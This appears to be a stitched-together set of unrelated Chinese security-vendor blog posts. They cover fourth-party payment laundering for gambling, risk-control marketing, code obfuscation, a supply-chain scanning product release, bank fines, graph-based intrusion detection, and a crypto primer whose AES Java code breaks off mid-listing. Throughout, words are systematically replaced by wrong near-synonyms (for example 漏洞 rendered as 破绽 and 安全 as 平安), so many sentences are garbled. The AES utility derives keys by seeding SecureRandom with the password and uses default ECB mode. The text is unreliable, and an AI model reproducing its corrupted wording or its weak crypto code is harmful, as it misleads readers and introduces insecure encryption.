“四方平台”即第四方领取平台，是绝对于第三方领取平台而言的。通过聚合领取平台、单干银行及其他服务商等接口，非法对外提供领取结算业务的网络平台，系以后电信网络欺骗、网络赌博等犯罪团伙套取、漂白非法资金的所谓“绿色通道”。第四方领取介于第三方领取和商户之间，没有领取许可牌照的限度，因而资金流动也就缺失监管。 因为支付宝、微信等第三方领取平台监管严格，非法网站无奈间接接入，一些非法“第四方领取平台”便应运而生，并逐步成为赌博、色情等黑灰产业眼中的“香饽饽”。 于是，他们在本人网店“购物”时，赌博网站就从资金池划拨相应金额到网店的账户，如此一来，赌徒在赌博网站给账户充值，产生的是“网购”行为，防止了因大量资金流动异样而被银行监管解冻。 而第四方领取的也催生了大量跑分平台。 所谓“跑分”是指非法领取结算平台从跨境网络赌博平台购买“分值”（即筹码），而后由“码商”进行认购，并招募“码农”提供收款二维码，每实现一笔交易，相应环节都能取得佣金提成。 其个别流程是： 码商去电商平台开虚伪店铺，码商和码农在所谓“跑分平台”上支付工作。这类跑分平台成了各类和领取相干的洗钱等行为的撮合交易平台。最终，境内的各类中介和赌博团体通过虚构币、公开钱庄等渠道结算并转移资金。 这样一条龙的服务游走在各大互联网公司的责任和利益边缘，既实现了赌博团体的导流和疾速领取，又满足了搜寻平台的广告支出、电商平台的刷量需要，还为物流公司带来了快钱。 而电商平台之所以成为黑灰产泛滥的温床，一方面是因为黑灰产对于电商平台的长期浸透，充沛理解电商平台的规定； 另一方面也是因为网络赌博的立功老本较低。用于赌博的软件能够在开发进去之后，以用户范畴的不断扩大而逐渐分担软件的开发成本，起初的用户能够以极低的老本来应用这类软件。 加之黑灰产逐步分化成为有组织、精细化、复杂化。从产业链散布来看，上游有开掘互联网平台破绽制作攻打工具的团队，专门的料商、卡商和养号平台；中游有针对不同交易类型搭建交易模块，提供集约化解决计划的组织；上游散布着宽广的金字塔式的代理群体、推广引流人员。 电商平台如何防备黑灰产作恶不无讥刺的是，国内的各大电商平台都有本人的风控系统，缘何让黑灰产钻了空子？一方面是黑灰产针对电商平台的风控规定做了无意躲避，另一方面，各大电商平台往往业务杂、规定繁冗、破绽多，并且，电商业务中波及到的优惠零碎、客户零碎等，规定应用上相互重叠破绽很多，业务危险点多，账户、订单等各零碎均有可能呈现破绽，单点防控难度大。此外，传统的反欺诈工具无奈从全局视角洞察欺诈危险。业务危险欺诈一直变动，伎俩更迭疾速，一旦呈现新型的攻打伎俩，无奈疾速辨认或躲避危险。 因而，对于电商平台而言，需构建一个笼罩多渠道全场景，可能协调行业企业疾速响应，提供多阶段防护的平安体系，可能满足不同业务场景，并基于本身业务特点实现积淀和更迭演进，实现平台的精准防控。 以顶象风控系统为例。 1、事先辨认定期平安检测。针对黑灰产应用的刷单舞弊软件，客户端可集成平安SDK，定期对App的运行环境进行检测，对于存在代码注入、hook、模拟器、云手机、代理、VPN、root、越狱等危险可能做到无效监控和拦挡。 客户端平安防护。跨境电商平台的App和网站，能够别离部署H5混同防护及端平安加固，以保障客户端平安。 通信传输平安保障。通过对通信链路的加密，可避免黑灰产在业务通信传输的环节篡改报文数据，保障终端平安检测模块的数据。 2、事中防备 业务安全策略防控。基于刷单行为的危险特色，电商平台在下单场景接入业务平安风控系统。将终端采集的设施指纹信息、用户行为数据等传输给风控系统，通过在风控系统配置相应的平安防控策略，无效地对危险进行辨认和拦挡。 风控维度倡议： 1）设施终端环境检测。辨认客户端（或浏览器）的设施指纹是否非法，是否存在注入、hook、模拟器等危险。通常批量舞弊软件大多都存在以上危险特色。 2）用户行为检测。基于用户行为进行策略布控。针对同设施（或同用户）高频下单，同设施关联大量账号，同收货地关联大量订单等异样行为进行检测和拦挡。 3）名单库保护。基于风控历史数据，对于存在异样行为的店铺或者买手账号进行标注，积淀到相应的名单库。在后续的营销流动中进行重点排查。 4）内部数据服务。思考对接手机号危险评分、IP危险库、代理邮箱检测等数据服务。 5）算法模型。线上数据有肯定积攒当前，通过风控数据以及业务的积淀数据，对用户下单这一场景进行建模，模型的输入能够间接在风控策略中应用。 3、预先处理依据业务理论需要，顶象进攻云业务平安情报中心提供两种处理倡议。 1）静默数据监测。辨认到危险后不即刻实时反馈后果给到用户，由后盾对立收集积淀，并进行用户的标签标注。对于存在异样的店铺或买家账户，后续定期批量发动一次认证申请。若无奈实现认证的，则无奈再持续应用该账户。 2）线上实时反馈。对下单时辨认为危险的申请进行实时拦挡，间接反馈下单失败等。 除此之外，还可基于深度学习的关联关系图谱技术落地至银行业务场景，扩大危险防控的视角和伎俩，利用智能模型平台构建一套残缺的基于关联关系图谱的欺诈和洗钱账户辨认机制。

顶象业务平安大讲堂第二季将于2月23日重磅回归，本季业务平安大讲堂持续以业务平安为主题，为大家带来业务平安干货。’此外，本季咱们将持续邀请各界大咖作为主讲嘉宾，分享他们在业务平安畛域的心得体会，独特学习，共同进步。咱们心愿可能构建一个平等交换的平安圈生态，以全新的视角关上业务平安，直播内容聚焦业务平安的整体行业趋势、业务平安的危险以及业务平安背地的技术剖析。这相对是不容错过的直播盛宴。首期咱们特地邀请到了平安圈内大佬书半生和大家讲讲对于挖洞那些事儿。本期主讲嘉宾——书半生，资深网络安全技术博主。领有4年浸透测试的教训，曾获2022顶象首届业务平安保卫战第一名，顶象特邀数字业务平安研究员，粉丝10w+，edusrc高级白帽子，2022年度CSDN博客之星前20、运维与平安畛域Top1、网络安全畛域优质创作者，攻防世界、vulfocus等平台前100。主攻外网服务端、客户端破绽等破绽的钻研，以及对内网浸透和黑产情报的收集。同时，顶象也欢送各位圈内圈外大佬以及相干客户积极参与到咱们第二季的业务平安大讲堂直播流动中来，有动向的可增加小助手沟通参加。本期直播奖品也做了全新降级，奖品包含但不仅限于：1、联结出书的署名权机会；2、现金处分；3、顶象周边。超多精彩，千万别错过哦！Tips：本期直播将在顶象视频号&钉钉&B站顶象直播间&CSDN顶象技术直播间多平台同步直播，感兴趣的同学记得肯定要提前锁定直播间哦！

“我想来到浪浪山。”在数次尝试破解某个App 时，某个逆向工程师无奈感叹道。逆向工程师顾名思义就是把一个个残缺的软件逆推，还原成一段段代码，不便破解。比方给他们一个手机App、电脑程序，用不了多久，他们就能逆推出程序的运行逻辑，找到其中的要害代码，篡改、破解、发现破绽。这其中最好的例子就是盗版软件。开发者们累死累活才写好的程序，分分钟就被人逆向破解，植入广告和木马，从新打包成盗版。但逆向工程师并非是背面形象，亦有好坏之分，正义的逆向者只是做平安钻研，而那些非正义的逆向者却拿着这项技能到处干坏事牟利。因而，二者的对抗也尤为显著，一方为了防破解使出浑身解数，一方为了破解搜索枯肠。明天，咱们就来讲讲对于让非正义的逆向工程师们头疼的代码混同。 代码混同到底是什么？对于代码混同，百度百科给出的解释是：代码混同（Obfuscation）是将电脑程序的原始代码或机器代码，转换胜利能上等价，然而难于被人浏览和了解的行为。混同后的代码，会将原先有明确含意的类名、字段、函数等转为无意义的单词，这样对于计算机来说，执行逻辑还是失常的，然而当人们去剖析混同后的代码时，会加大浏览和了解的难度，以此来增强代码的爱护。什么意思呢？咱们能够简略了解为代码开发者是想给破解者（逆向工程师）制作一个假象，从而让他们从其余角度去尝试破解，但破解之后发现方向是错的，便又须要从新找角度破解，减少破解难度，也给开发者们充沛工夫来反抗破解。举个例子。你想去超市买水果，但又不想让人晓得，于是你先去买了卫生纸回来，又去了健身房，而后又去超市买了可乐，最初才去超市买了水果。这样一来，他人对你的口头目标就不是明确的，须要屡次猜想推理能力晓得你的目标。代码混同的逻辑便是如此，代码开发者们为了暗藏目标，会在代码里退出各种多余的垃圾指令和代码，把原来的逻辑拆分成各种怪癖语法，从而达到防破解的目标。 如何做代码混同？讲到这里，你肯定也好奇，代码混同到底是怎么做的？对此，顶象挪动平安总监Bob解释道：代码混同次要有以下几方面工作：1、代码中的蕴含各种元素，比方变量、函数、类的名字，这些名字有实际意义，直白的通知破解者这个代码的性能用处．如果能改成无意义的名字，使得破解者浏览时无奈依据名字猜想其性能用处；2、良好的代码有着直白的代码逻辑，破解者浏览时能够轻易的反推出性能用处．如果将它们变为性能上等价、然而更难了解的模式，比方将循环改为递归、精简两头变量等，破解者须要付出更高的代价能力明确其性能用处；3、对于一些解释型的代码，比方JavaScript，通常以源代码的模式公布，代码有良好的格局并且蕴含正文间接形容了代码的性能用处．如果能打乱代码的格局，删除源码正文，删除空格，将多行代码挤到一行代码等，破解者将难以从源码中获取无效信息；对代码的浏览通常须要借助一些逆向工具，比方IDA，JADX，JDGUI．如果能用某种形式让这些逆向工具生效，能够逼迫破解者应用效率公开的手工剖析，进而烦扰反编译的工作。一般而言，代码混同的常见伎俩分为以下几种：1、名称混同将有意义的类，字段、办法名称更改为无意义的字符串。生成的新名称越短，字节代码越小。在名称混同的字节代码中，包，类，字段和办法名称已重命名，并且难以复原原始名称。2、代码缩减删除代码中对运行无用的正文，空格，换行，回车，调试信息，行号等，能够减小代码体积同时升高代码中无效的信息量．3、控制流混同用于if, switch, while,for等关键字，对代码进行轻微的批改，模糊控制流，而不扭转代码在运行时的行为。通常状况下，抉择和循环等逻辑结构会被更改，因而它们不再具备间接等效的源代码。流含糊的字节码通常强制反编译器将一系列标签和非法的go to语句插入到它们生成的源代码中。4、数据流混同对一些通用的计算，将其替换为等价的模式．比方a=b+c替换为a=b+1+c-1．5、花指令在失常的指令序列中增加一些指令，对运行时有害，然而会触发逆向工具的Bug，造成逆向工具解体，无奈反汇编，无奈反编译，性能异样等．此外，还有异样混同、字符串加密混同、援用混同等。对于Java来说，罕用的混同工具如下：1、yGuardyGuard是一款收费的Java混同器（非开源），它有Java和.NET两个版本。yGuard 完全免费，基于 Ant 工作运行，提供高可配置的混同规定。2、proguardproguard是一个收费的 Java类文件的压缩，优化，混肴器。它删除没有用的类，字段，办法与属性。使字节码最大水平地优化，应用简短且无意义的名字来重命名类、字段和办法。3、allatori第二代Java混同器。所谓第二代混同器，不仅仅能进行字段混同，还能实现流混同。 代码混同不等于加密那么，混同等同于加密吗？答案当然是否定的。加密顾名思义就是要在咱们想要暗藏的货色上上锁，能够是一道锁，也能够是多道锁，而混同则不同，在进行混同解决时，信息将放弃原样，只是以一种含糊的格局出现进去，因为咱们将其复杂性进步到不可能（或简直不可能）被了解或解析的水平。绝对于加密而言，则进一步证实了代码混同在防破解方面的高超之处。咱们都晓得，加密的货色必须解密能力应用，就像一把锁和一堆钥匙，总有一把钥匙能够胜利关上锁，让你看到其中的逻辑，但代码混同不同，尽管没有加密，但代码开发者们却让逆向工程师们一遍遍在破解的迷宫里来回转圈，烦扰破解。这就会导致两种状况：一种是逆向工程师死磕到底，一种是放弃破解转而去破解更容易破解的App，从而达到爱护App 的成果。当然，代码混同并不能真正避免逆向工程，只能减少难度，对于安全性要求很高的场景，仅应用代码混同并不能保障原始代码的平安。并且，对于代码混同而言被混同的代码难于了解，因而调试以及除错也变得艰难起来。开发人员通常须要保留原始的未混同的代码用于调试。对于反对反射的语言，代码混同有可能与反射发生冲突。 App 加固非一时之功正如前文所说，代码混同并不能真正避免逆向工程，总有拨开云雾的一天，仅应用代码混同并不能保障原始代码的平安，也不能实现保障App 加固不被破解，此时就须要多方出手，为App 的防破解环境加筑更多城墙。比方字符串加密、控制流平坦化、指令替换、符号混同、混同多样化、不通明谓词、防动静调试、防动静注入、HOOK检测、代码段测验、完整性校验等等多种技术手段。对于App 加固而言，这素来都不是一件简略的事件，一方有难，八法声援才是爱护App 不被破解的良方。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

明天，咱们很快乐发表 Seal 0.4 已正式公布！在上一个版本中，Seal 实现了从繁多产品到全链路平台的转变，通过全局视图帮忙用户把握软件开发生命周期各个环节的平安情况。  在 Seal 0.4 中，全局视图将再一步降级，软件供应链全链路的平安洞察失去进一步加强，新版本为用户提供了软件供应链常识图、更细粒度的指标可视化以及更灵便可控的扫描配置等个性，帮忙开发团队深刻发觉供应链组件之间的上下游关系，及时发现潜在平安问题，进而升高修复老本。  产品试用：https://seal.io/trial 产品文档：https://seal-io.github.io/docs/    全面直观的平安洞察软件开发生命周期（SDLC）笼罩了从开发到部署、公布的各个环节，每个环节都有可能引入新的依赖项，最终由成千上万个间接或间接依赖项形成软件供应链。这意味着在很大水平上依赖项的衰弱会影响整个软件供应链的平安。  依赖项的衰弱水平波及诸多影响因素：它的许可证是否合规？如果是开源组件，它是否被良好保护？在代码中是否存在破绽？破绽的重大水平如何？  一个存在平安问题的依赖项同时也对上下游组件产生影响，Endor Labs 在2022年公布的《依赖项治理状态报告》中指出，95%的易受攻击的依赖项都是可传递的。 而在数量宏大的依赖项中通过手动的形式查找它们相互之间的传递关系无异于海底捞针。  因而，理解依赖项之间的关联关系以及监控软件供应链外围的平安指标对于保障软件供应链平安至关重要。  软件供应链常识图在 Seal 0.4 中新增了软件供应链常识图，直观地展现供应链中的组件类型以及它们的关联关系。此外，用户能够设置多种检索条件充沛把握软件资产平安合规状况。 软件供应链常识图  例如，当用户理解到某个破绽重大等级评分较高，想要查问该破绽是否存在于软件供应链中以及会影响到的所有软件资产，那么能够通过设置条件进行检索：   另外，如果企业发现某个许可证不合规，也能够通过常识图查找和某个许可证相干的所有软件资产：   更细粒度的指标可视化因为软件供应链牵涉到整个软件开发生命周期的各个环节以及各种类型的平安问题，比方许可证合规、组件破绽、配置谬误、密钥泄露危险等，因而软件供应链平安问题始终是繁琐且简单的。 因而，要精确把握软件供应链全链路的平安情况就须要设置正当的且足够细粒度的指标进行监控。  在 Seal 0.4 中，全局视图将全面降级，用户能够在概览中查看更丰盛的统计信息和指标数据，比方问题严重性散布、许可证依赖散布、问题趋势等。 Seal 全局概览  除概览页外，用户能够在资源、利用详情页查看趋势图表及其他平安问题指标，帮忙开发团队评估各自我的项目中的平安缺点和修复状况。   灵便可控的扫描配置Seal 0.3 将平安扫描扩大到了全链路，用户能够取得残缺的从代码仓库到运行环境全软件供应链各环节扫描检测能力。Seal 0.4 将提供更灵便的扫描配置，让开发团队能够依据本身需要设置扫描频率、触发规定等，次要包含： 反对自定义源代码仓库扫描的Webhook触发规定反对自定义资源定期扫描的规定反对自定义依赖组件修复倡议的生成配置 构建开发者敌对的全链路管理平台为了响应一直变动的市场需求，企业须要疾速迭代产品以领先取得市场先机，进而获取微小的商业价值。要保障产品疾速迭代并平安公布，“左移”曾经成为业界共识，行将测试、平安、FinOps等环节融入软件开发流程中，增强各部门之间的合作。  当开发团队也须要和平安团队独特承当平安责任时，加重开发团队的认知累赘、平滑学习曲线、升高学习老本变得尤为重要。Seal 致力于构建开发者敌对的全链路管理平台，通过直观、具体的可视化视图为开发人员提供清晰地问题修复门路，升高平安问题修复的老本。 在将来，Seal 将会针对开发人员的软件开发流程体验继续优化，请放弃关注哦！  如果您对 Seal 0.4 感兴趣，欢送拜访试用链接收费体验尝鲜：seal.io/trial

春节后，央行公示首批罚单。其中，厦门银行被中国人民银行福州核心支行给予正告，并没收守法所得767.17元，处罚款764.6万元。同时，相干高管和多名工作人员也被处罚。依据公示内容能够显示，厦门银行因涉征信治理、个人信息爱护以及反洗钱与反欺诈等23项违法行为。 个人信息爱护的问题此次罚单中多项违法行为波及金融消费者个人信息爱护问题。近年来，监管部门踊跃推动消费者信息爱护制度建设，着力增强对银行账户的风险管理以及对金融消费者权利爱护违规的处罚力度，以更好地爱护人民大众的财产平安和合法权益。2020年11月开始履行的《中国人民银行金融消费者权利爱护实施办法》要求，银行该当落实法律法规和相干监管规定对于金融消费者权利爱护的相干要求，建立健全消费者金融信息爱护等各项内控制度。2022年8月，银保监会下发《对于发展银行保险机构侵害个人信息权利乱象专项整治工作的告诉》，对金融机构个人信息爱护做出了较为粗疏的规定，包含个人信息收集、个人信息存储和传输、个人信息查问、个人信息应用、个人信息提供、个人信息删除、第三方单干等多个方面。要求相干机构进行自查，并在年底做出反馈。 征信治理的问题除了金融消费者个人信息爱护问题，厦门银行此次违规还波及征信治理。《个人信用信息根底数据库治理暂行办法》规定，中国人民银行、商业银行及其工作人员该当为在工作中知悉的个人信用信息窃密。2022年1月施行的《征信业务管理方法》明确了征信业务应用数据的准则，蕴含信息采集、应用标准、监督管理等方面内容。要求从事征信业务及其相干流动，该当爱护信息主体合法权益，保障信息安全，防备信用信息泄露、失落、毁损或者被滥用，不得危害国家机密，不得进犯个人隐私和商业秘密。银行等信息使用者该当采取必要的措施，保障查问个人信用信息时获得信息主体的批准，并且依照约定用处应用个人信用信息。 反洗钱与反欺诈的问题本次处罚中，反欺诈与反洗钱问题最为突出，不仅厦门银行危险管理部和负责风险管理的副行长受到处罚，来自营运管理部、网络金融部、批发业务管理部业务部门的3名责任人也被处罚。2021年4月施行的《金融机构反洗钱和反恐怖融资监督管理方法》规定，金融机构该当依照规定，联合外部管制制度和危险管理机制的相干要求，履行客户渎职考察、客户身份材料和交易记录保留、大额交易和可疑交易报告等任务。同时，要求金融机构该当在总部层面制订对立的反洗钱和反恐怖融资机制安顿，包含为发展客户渎职考察、洗钱和恐怖融资风险管理，共享反洗钱和反恐怖融资信息的制度和程序，并确保其所有分支机构和控股从属机构联合本身业务特点无效执行。2022年12月1日起实施的《中华人民共和国反电信网络欺骗法》也要求，银行机构要履行反洗钱、反诈职责，建设渎职考察制度，对涉诈异样银行卡、可疑交易等进行监测处理。 金融欺诈更加复杂多变近年来，金融管理部门继续欠缺银行账户和领取账户管理制度，建设账户分类分级管理体系，夯实账户实名制，建设涉诈交易监测、辨认和拦挡制度，牢牢守护人民大众“钱袋子”。2021年，金融零碎辨认拦挡资金能力显著回升，商业银行、领取机构依据公安部门指令，查问、止付、解冻涉诈资金1.5亿笔，紧急拦挡涉诈资金3291亿元。欺诈与洗钱日益简单，给监管带来诸多挑战，尤其在工作有效性和效率上，具体表现如下：1、不法团伙利用各种技术手段和购买的身份信息，通过包装身份、开具虚伪账号，不利于金融机构分别其身份和交易行为。2、金融业务互联网化疾速倒退，便捷的渠道和形式让洗钱的伎俩变化多端，减少了做审查和监控的复杂性。3、欺诈和洗钱的伎俩更加荫蔽，须要从账号源头上挖掘出外在的关联性，列出彼此的关系图谱，针对性的监测更无效发现欺诈与洗钱行为。 顶象助力金融机构反欺诈反洗钱顶象可能帮忙金融机构构建一个笼罩多渠道全场景，提供多阶段防护的平安体系，提供威逼感知、平安防护、数据积淀、模型建设、策略共享等平安服务，及时监测到异样交易，详尽勾画出用户画像，精准定位欺诈和洗钱账号，帮忙金融机构实现高效的危险防控，满足不同业务场景，助金融机构更无效精准的防控。1、晋升危险感知能力。借助顶象业务平安情报，提炼总结剖析出电信欺骗危险、IP地址危险、设施危险、涉毒涉诈危险、交易危险以及不同行业危险的业务平安信息，剖析挖掘出攻打特色、潜在隐患，从而及时无效晋升平安应急响应能力，制订迷信无效的防控策略。2、加强源头的反欺诈辨认能力。通过设施指纹、顶象App加固、智能验证码，对基于设施型号、行为特色、拜访频率、地理位置等多维特色进行危险辨认，与风控系统良好补充，无效发现模拟器、刷机改机、团伙舞弊等欺诈行为。3、及时监测异样资金交易。基于账户的紧急联系人、互通电话、同一网络、从属关系等信息以及信贷申请、日常存贷、资金交易、设施登录等数据，利用关联网络平台，构建用户关系图谱，借助于规定或模型辨认图谱中异样的资金交易行为和异样交易个人，与相干业务零碎及反欺诈反洗钱零碎联动排查危险。4、精准定位欺诈和洗钱账号。基于深度学习的关联关系图谱技术落地至银行业务场景，扩大危险防控的视角和伎俩，利用智能模型平台构建一套残缺的基于关联关系图谱的欺诈和洗钱账户辨认机制。 业务平安产品：收费试用 业务平安交换群：退出畅聊

青藤云平安是一家主机平安独角兽公司，看名字就晓得以后很大一块方向专一云原生利用平安，目前主营的是主机万相/容器蜂巢产品，行业当先，累计反对 800万 Agent。以后公司基于 NebulaGraph 联合图技术开发的下一代实时入侵检测零碎曾经初步投入市场，参加了 2022 护网口头，获得了不错的反应。 本文将简略介绍基于图的入侵检测零碎，抛砖引玉，冀望能有更多优秀人才参加开掘图与平安的联合利用。 入侵检测的现状与挑战支流入侵检测零碎入侵检测始终是平安钻研的一大方向，青藤的万相和蜂巢两套产品别离为基于主机和容器的主机入侵检测产品，它们的原理都相似，如下图。 Agent 埋在主机/容器侧，接管服务端下发的规定联合采集的原始事件（过程/网络连接/文件读写等），通过平安专家编写规定，比方：过程文件 MD5/文件 MD5/执行命令行/机器学习等特色，命中当做告警报进去，相干告警上报到服务端；另外全量的原始事件也上报给服务端日志收集零碎，入库保留到 SIEM 零碎。 这套零碎一旦告警上报到服务端，平安人员会拿以后告警相干信息到 SIEM 中查问告警产生时刻前后相干的事件，必要时登录相干机器查看相干信息，综合判断以后攻打告警是否无效并做相干处理。 这套零碎是以后入侵检测的支流架构，然而也存在诸多问题： 基于单事件+规定做单点检测，可能造成大量误报（规定太松）或漏报（规定太严）同一次攻打触发的告警可能过多，平安剖析人员剖析溯源工作量微小同一次告警相干原始事件须要借助 SIEM 人工剖析，不足可视化伎俩图与平安钻研方向其实，能够看到这里的几个问题点实质上都是独立去对待每个告警和事件，实际上一次攻打相干的告警/事件应该是彼此关联的，这里很天然想到用图去把这些原始事件/告警关联起来整体剖析。事实上，这也是以后平安钻研的一个热门方向——溯源图，借助溯源图咱们做如下多方面的平安剖析和检测： 1.图检测传统平安解决的相似 IOC 检测，也就是单点判断，针对过程/网络连接/文件等实体判断是不是平安的；理论攻打面临的问题，可能各个点都检测不进去，但理论行为是危险的——1 个规定写不全，就算规定能写进去，比方命中某个命令行，然而触发告警很多，最终也无奈利用。也就是要综合判断各种组合关系，这是图善于的事件，也就是平安中图检测的问题——把所有相干的事件放在一张图中来综合判断剖析是否为无效攻打。 图检测钻研很早，然而面临计算量和算法的双重挑战，目前行业利用很少，基本上组合判断都还是序列检测形式。问题是序列规定能写多少确定规定，规定太多也有问题，无奈利用；方才提到确定规定，无奈很好含糊匹配，也就是开掘，平安中规定太确定就能够被绕过，黑客很聪慧且借助自动化攻打更容易绕过这些规定。 2.图关联和溯源方才提到告警，也就是以后所有平安产品面临的另一个问题——要不是规定命中不了，要不就是规定命中太多，咱们叫告警吞没，平安经营解决能力无限，可能一天 100 个告警还好，如果一天甚至一小时 10000 条告警就没法解决了，那和没告警没差异。 这其实是一个平安中关联分类和溯源的问题： 一次攻打会产生很多告警，比方：暴力破解登录，用了歹意文件，执行了歹意命令等等，关联分类把一次攻打中相干的告警关联在一起，这是图善于的事件。这些告警关联在一起，还能够综合评判也就是多个告警联结判断以后攻打是否无效；每个告警只会通知你以后你是过程、文件、网络有问题，那这个问题是如何产生的，黑客是怎么进来的，文件是从哪里下载的，先干了什么后干了什么。平安产品须要帮忙客户实现这个剖析过程，目前行业是借助 SIEM/THP/SOC 等平安产品，所有原始事件都上传保留，找平安专家，从告警开始查原始事件日志，看告警前产生了什么，哪些有关系可能导致攻打，这个过程短则几分钟，长甚至数个小时。平安是个反抗过程，早就是优——越早发现越早反抗，封禁或隔离，否则就算发现也为时过晚。能够把相干的原始事件实体（过程/网络等）入图，借助图能够可视化摸索和溯源整个攻打过程，这就是图溯源的过程，学术叫因果图、溯源图。3.图常识图谱和预测咱们晓得以后平安从根本上讲还是基于规定或者说先验常识，每种破绽/木马/攻打工具/攻打过程/攻打组织都有它的特色，前几种规定还比拟好形容，攻打过程、攻打组织等就很难残缺形容了。 目前的支流做法是基于平安框架构建知识库，以后支流有 Kill Chain/ATT&CK 等框架，这是美国国防部主导的网络攻击和平相干两家公司提出的平安剖析框架，相当于划分了攻打的战术和具体攻打技术的映射，这个具体如何施行比拟难。平安学术界，比方：伊利诺伊大学/普渡大学近两年都在钻研相似问题，也就是平安知识库（平安常识图谱）的构建。有了这个欠缺的知识库，就能够实现平安的终极构想，比方：我晓得你的攻打过程/攻打组织，是不是就能够在攻打真正开始前，好比你打仗刚拿起枪冲到阵地上，判断你是要朝我开枪，预判间接击毙。 国内外现状目前基于图的入侵检测零碎，真正率先投入到实战中的是美国的平安明星公司——Crowd Strike，它齐全基于图构建平安零碎，当初相当于做了图检测和图关联溯源这两块的事件，目前估值 670 亿美元。云计算巨头 AWS 和 Azure 都在跟进它的办法。国内基于图做入侵检测零碎的，目前有公开材料的是微步在线和深服气，他们相当于做了局部图关联和溯源的工作。 青藤云平安的万相和蜂巢在入侵检测深耕多年，曾经获得了行业认可的平安检测能力，所以抉择从图关联和溯源动手，基于 NebulaGraph 联合图技术开发的下一代实时入侵检测零碎，先重点解决告警吞没和关联溯源的痛点问题。 青藤云平安下一代入侵检测零碎检测原理架构图如下，外围是上报的攻打告警和局部原始事件对立在图中实时关联。 产品成果通过关联引擎关联解决输入的就是攻打事件，一个攻打事件可能关联多个攻打告警并可视化出现进去，以后产品效果图如下： 同一次攻打利用歹意文件和木马 敏感容器挂载 自定义脚本检测 NebulaGraph 的劣势抉择 NebulaGraph 次要基于如下思考： 图查问的刚需，特地是关联和溯源时多级过程关系查问，借助 Cypher查问图数据库可能比借助 SQL 在关系数据库中查问多级关系容易多；大规模存储，波及到大量事件和告警的存储；高性能查问场景需要，关联须要保障近实时，以后相干查问都在 ms 级别；得益于 NebulaGraph 的良好性能，关联引擎以近实时的形式入图和计算关联，入图局部是青藤本人基于 Flink 打造的实时入图组件，只须要更改配置文件即可实现图点边映射入图。 ...

京东科技 姚永健一、术语表：1.对称算法加密解密密钥是雷同的。这些算法也叫机密密钥算法或单密钥算法，它要求发送者和接收者在平安通信之前，约定一个密钥。对称算法的安全性依赖于密钥，透露密钥就意味着任何人都能对音讯进行加密解密。只有通信须要窃密，密钥就必须窃密。 对称算法可分为两类。一次只对明文中的单个位（有时对字节）运算的算法称为序列算法或序列密码。另一类算法是对明文的一组位进行运算，这些位组称为分组，相应的算法称为分组算法或分组明码。古代计算机明码算法的典型分组长度为64位――这个长度大到足以避免剖析破译，但又小到足以不便作用。 2.非对称算法非对称算法也叫公开密钥加密,它是用两个数学相干的密钥对信息进行编码。在此零碎中，其中一个密钥叫公开密钥，可随便发给冀望与密钥持有者进行平安通信的人。公开密钥用于对信息加密。第二个密钥是公有密钥，属于密钥持有者，此人要认真保留公有密钥。密钥持有者用公有密钥对收到的信息进行解密。 一般来说，都是公钥加密，私钥解密。如果零碎单方须要互相通信，能够生成两对密钥对。各自保留好本人的私钥和对方的公钥，用公钥加密，私钥进行解密 3.可逆加密算法一般来说，波及到秘钥之类的算法，都是可逆的。意思就是通过算法和秘钥加密之后，能够再次通过解密算法还原。常见的有DES、3DES、AES128、AES192、AES256 。其中AES前面的数字代表的是密钥长度。对称加密算法的安全性绝对较低，比拟实用的场景就是内网环境中的加解密。 4.不可逆算法常见的不可逆加密算法有MD5，HMAC，SHA1、SHA-224、SHA-256、SHA-384，和SHA-512，其中SHA-224、SHA-256、SHA-384，和SHA-512咱们能够统称为SHA2加密算法，SHA加密算法的安全性要比MD5更高，而SHA2加密算法比SHA1的要高。其中SHA前面的数字示意的是加密后的字符串长度，SHA1默认会产生一个160位的信息摘要。 不可逆加密算法最大的特点就是不须要密钥 5.加密盐加密盐也是比拟常听到的一个概念，盐就是一个随机字符串用来和咱们的加密串拼接后进行加密。加盐次要是为了保障加密字符串的安全性。如果有一个加盐后的加密串，黑客通过肯定伎俩失去这个加密串，他解密后拿到的明文，并不是咱们加密前的字符串，而是加密前的字符串和盐组合的字符串，这样相对来说又减少了字符串的安全性 或者也能够用在签名，例如签名是对明文或者密文加盐后的签名，有人想串改数据，如果不晓得这个盐和规定，那么接管方验签就会不通过，从而保障通信的平安。 二、传统加密算法介绍DES（Data Encryption Standard）：对称算法，数据加密规范，速度较快，实用于加密大量数据的场合。 AES算法：是DES的升级版，属于对称算法。可逆 代码：AESUtil package AES;import java.io.UnsupportedEncodingException;import java.nio.charset.StandardCharsets;import java.security.InvalidKeyException;import java.security.NoSuchAlgorithmException;import java.security.SecureRandom;import java.util.Base64;import javax.crypto.BadPaddingException;import javax.crypto.Cipher;import javax.crypto.IllegalBlockSizeException;import javax.crypto.KeyGenerator;import javax.crypto.NoSuchPaddingException;import javax.crypto.SecretKey;import javax.crypto.spec.SecretKeySpec;public class AESUtil { /** * AES加密字符串 * * @param content * 须要被加密的字符串 * @param password * 加密须要的明码 * @return 密文 */ public static byte[] encrypt(String content, String password) { try { KeyGenerator kgen = KeyGenerator.getInstance("AES");// 创立AES的Key生产者 kgen.init(128, new SecureRandom(password.getBytes()));// 利用用户明码作为随机数初始化出 //加密没关系，SecureRandom是生成平安随机数序列，password.getBytes()是种子，只有种子雷同，序列就一样，所以解密只有有password就行 SecretKey secretKey = kgen.generateKey();// 依据用户明码，生成一个密钥 byte[] enCodeFormat = secretKey.getEncoded();// 返回根本编码格局的密钥，如果此密钥不反对编码，则返回 SecretKeySpec key = new SecretKeySpec(enCodeFormat, "AES");// 转换为AES专用密钥 Cipher cipher = Cipher.getInstance("AES");// 创立明码器 byte[] byteContent = content.getBytes("utf-8"); cipher.init(Cipher.ENCRYPT_MODE, key);// 初始化为加密模式的明码器 byte[] result = cipher.doFinal(byteContent);// 加密 return result; } catch (NoSuchPaddingException e) { e.printStackTrace(); } catch (NoSuchAlgorithmException e) { e.printStackTrace(); } catch (UnsupportedEncodingException e) { e.printStackTrace(); } catch (InvalidKeyException e) { e.printStackTrace(); } catch (IllegalBlockSizeException e) { e.printStackTrace(); } catch (BadPaddingException e) { e.printStackTrace(); } return null; } /** * 解密AES加密过的字符串 * * @param content * AES加密过过的内容 * @param password * 加密时的明码 * @return 明文 */ public static byte[] decrypt(byte[] content, String password) { try { KeyGenerator kgen = KeyGenerator.getInstance("AES");// 创立AES的Key生产者 kgen.init(128, new SecureRandom(password.getBytes())); SecretKey secretKey = kgen.generateKey();// 依据用户明码，生成一个密钥 byte[] enCodeFormat = secretKey.getEncoded();// 返回根本编码格局的密钥 SecretKeySpec key = new SecretKeySpec(enCodeFormat, "AES");// 转换为AES专用密钥 